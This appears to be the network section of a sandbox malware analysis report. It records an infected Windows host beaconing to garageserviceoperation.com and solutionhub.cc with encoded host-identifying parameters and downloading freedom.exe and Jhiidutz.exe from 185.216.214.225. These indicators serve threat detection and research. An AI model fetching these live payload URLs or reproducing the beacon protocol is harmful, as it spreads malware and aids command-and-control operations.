Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| garageserviceoperation.com | 172.67.202.34 | |
| solutionhub.cc | 172.67.128.126 |
GET
200
https://garageserviceoperation.com/socket/?serviceCheckup
REQUEST
RESPONSE
BODY
GET /socket/?serviceCheckup HTTP/1.1
User-Agent: Mozilla/5.0 (OpiumG4ng Win32)
Host: garageserviceoperation.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 17 Aug 2024 13:18:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=fjtrr4k3be7plstscs0h21opip; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eruxclufAgmQL6ON%2BYxLmP8wpv9d66SSxqCyxT1uwnDT0ASgLT4psaHZMhITX0gepFX5uZrAjXc2svhBNfLDzTZY%2FxllFfZW%2BX1Fq9TNOMZLGIsPillQGtzSrgeg%2BqJVcjbQbTQCcdOM3LXkyg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b49f312f8162ae0-LAX
alt-svc: h3=":443"; ma=86400
GET
200
https://solutionhub.cc/socket/?serviceCheckup
REQUEST
RESPONSE
BODY
GET /socket/?serviceCheckup HTTP/1.1
User-Agent: Mozilla/5.0 (OpiumG4ng Win32)
Host: solutionhub.cc
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 17 Aug 2024 13:18:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=g164be67jtcif3jhpc7eabg7a7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SLzkz1fVOw5EwZMyDuEQius4XlpEQv1AOBszb4pwT9VL1h00%2BcgY0VeKvsVU8enws7FWWZy1MyfvFAQByJwIgIZSpQ%2FdvYi6S9FeAEjflvoYaa%2B1at2FPsXIQ%2FPYT%2BQ%2F8A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b49f318bfc60ffc-LAX
alt-svc: h3=":443"; ma=86400
GET
200
https://garageserviceoperation.com/socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3BCD138B5AFFC62
REQUEST
RESPONSE
BODY
GET /socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3BCD138B5AFFC62 HTTP/1.1
User-Agent: Mozilla/5.0 (OpiumG4ng Win32)
Host: garageserviceoperation.com
Cache-Control: no-cache
Cookie: PHPSESSID=fjtrr4k3be7plstscs0h21opip
HTTP/1.1 200 OK
Date: Sat, 17 Aug 2024 13:18:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1uPxJ%2FUhcHFI%2FGEjKuX6RuY1MWPPnkoxDSnFAQcaR9atxWn%2B%2BS13wfUQzaE7ABYh%2Be6QBHK3tOzim3aI4bj86vJfTVw5V6C%2FIxAsUZ5Gy2S4Fh8RXKwJ7ijwJzskBz6oTdlQ1HK5usq98fvPnQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b49f3235c762ae0-LAX
alt-svc: h3=":443"; ma=86400
GET
200
https://garageserviceoperation.com/socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3BCD138B5AFFC62&tsk=5F9ADE
REQUEST
RESPONSE
BODY
GET /socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3BCD138B5AFFC62&tsk=5F9ADE HTTP/1.1
User-Agent: Mozilla/5.0 (OpiumG4ng Win32)
Host: garageserviceoperation.com
Cache-Control: no-cache
Cookie: PHPSESSID=fjtrr4k3be7plstscs0h21opip
HTTP/1.1 200 OK
Date: Sat, 17 Aug 2024 13:18:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TbADjrrCCQYLWnpzOxnTTcLS%2BdgQYzWG2MgMxj%2FwzykIw1U3HFrPgWgG6cL3anjT7Xz6gfwFyV6CjOTgq5%2FGzDPjHZuzOQxsCV99Wtg4HL6dgXPf%2Fc7973vX8Aikfo9L22WUVuDjWsRpcwGHyg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b49f330ca915301-LAX
alt-svc: h3=":443"; ma=86400
GET
200
https://garageserviceoperation.com/socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3BCD138B5AFFC62&tsk=5F9ADF
REQUEST
RESPONSE
BODY
GET /socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3BCD138B5AFFC62&tsk=5F9ADF HTTP/1.1
User-Agent: Mozilla/5.0 (OpiumG4ng Win32)
Host: garageserviceoperation.com
Cache-Control: no-cache
Cookie: PHPSESSID=fjtrr4k3be7plstscs0h21opip
HTTP/1.1 200 OK
Date: Sat, 17 Aug 2024 13:18:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TK6wS7n1mfCzFq6hvWVU13qGomSfA3HaARHk9fngycZW4ftZ1kRTIW4BqyfJjVpAK4Tlko%2BKgdYjuozLQnd7Cu9jnmr8OUprzlkAPQtpV5mC1R7Yv7SDFPcus3BtQ4v2LsCvKyzeU1P8SAPCOA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b49f33f1c765301-LAX
alt-svc: h3=":443"; ma=86400
GET
200
https://garageserviceoperation.com/socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3BCD138B5AFFC62
REQUEST
RESPONSE
BODY
GET /socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3BCD138B5AFFC62 HTTP/1.1
User-Agent: Mozilla/5.0 (OpiumG4ng Win32)
Host: garageserviceoperation.com
Cache-Control: no-cache
Cookie: PHPSESSID=fjtrr4k3be7plstscs0h21opip
HTTP/1.1 200 OK
Date: Sat, 17 Aug 2024 13:19:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F1LvSjMK2EDY0BP4YBzbAbmis0DuNlpwxku86Qy3WyIksM4rPDqr5suvWGEhO%2BBYgxWVzMIfSYRnPWPcv9sajCZa%2BCQLAi1hK6vQpjrgzKnbny1VukxaJ95DJbHRs5bACfmua5CSj%2B5Fm8W3Rg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b49f4b96e2d5301-LAX
alt-svc: h3=":443"; ma=86400
GET
200
http://185.216.214.225/freedom.exe
REQUEST
RESPONSE
BODY
GET /freedom.exe HTTP/1.1
User-Agent: Mozilla/5.0 (OpiumG4ng Win32)
Host: 185.216.214.225
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 17 Aug 2024 13:18:24 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Thu, 08 Aug 2024 03:39:14 GMT
ETag: "17800-61f23c5420f4f"
Accept-Ranges: bytes
Content-Length: 96256
Content-Type: application/x-msdos-program
GET
200
http://185.216.214.225/Jhiidutz.exe
REQUEST
RESPONSE
BODY
GET /Jhiidutz.exe HTTP/1.1
User-Agent: Mozilla/5.0 (OpiumG4ng Win32)
Host: 185.216.214.225
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 17 Aug 2024 13:18:26 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Fri, 09 Aug 2024 00:59:07 GMT
ETag: "a5000-61f35a680ff51"
Accept-Ranges: bytes
Content-Length: 675840
Content-Type: application/x-msdos-program
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
| Flow | Issuer | Subject | Fingerprint |
|---|---|---|---|
|
TLSv1 192.168.56.101:49161 172.67.202.34:443 |
C=US, O=Google Trust Services, CN=WE1 | CN=garageserviceoperation.com | 9f:3e:b4:17:d0:54:94:2b:eb:35:8b:e9:ac:dd:e0:db:91:a5:35:e4 |
|
TLSv1 192.168.56.101:49163 172.67.128.126:443 |
C=US, O=Google Trust Services, CN=WE1 | CN=solutionhub.cc | a6:65:a4:77:51:a8:ca:dc:be:0c:0f:5b:5e:b4:fc:d4:cf:fb:24:09 |
|
TLSv1 192.168.56.101:49165 172.67.202.34:443 |
C=US, O=Google Trust Services, CN=WE1 | CN=garageserviceoperation.com | 9f:3e:b4:17:d0:54:94:2b:eb:35:8b:e9:ac:dd:e0:db:91:a5:35:e4 |
Snort Alerts
No Snort Alerts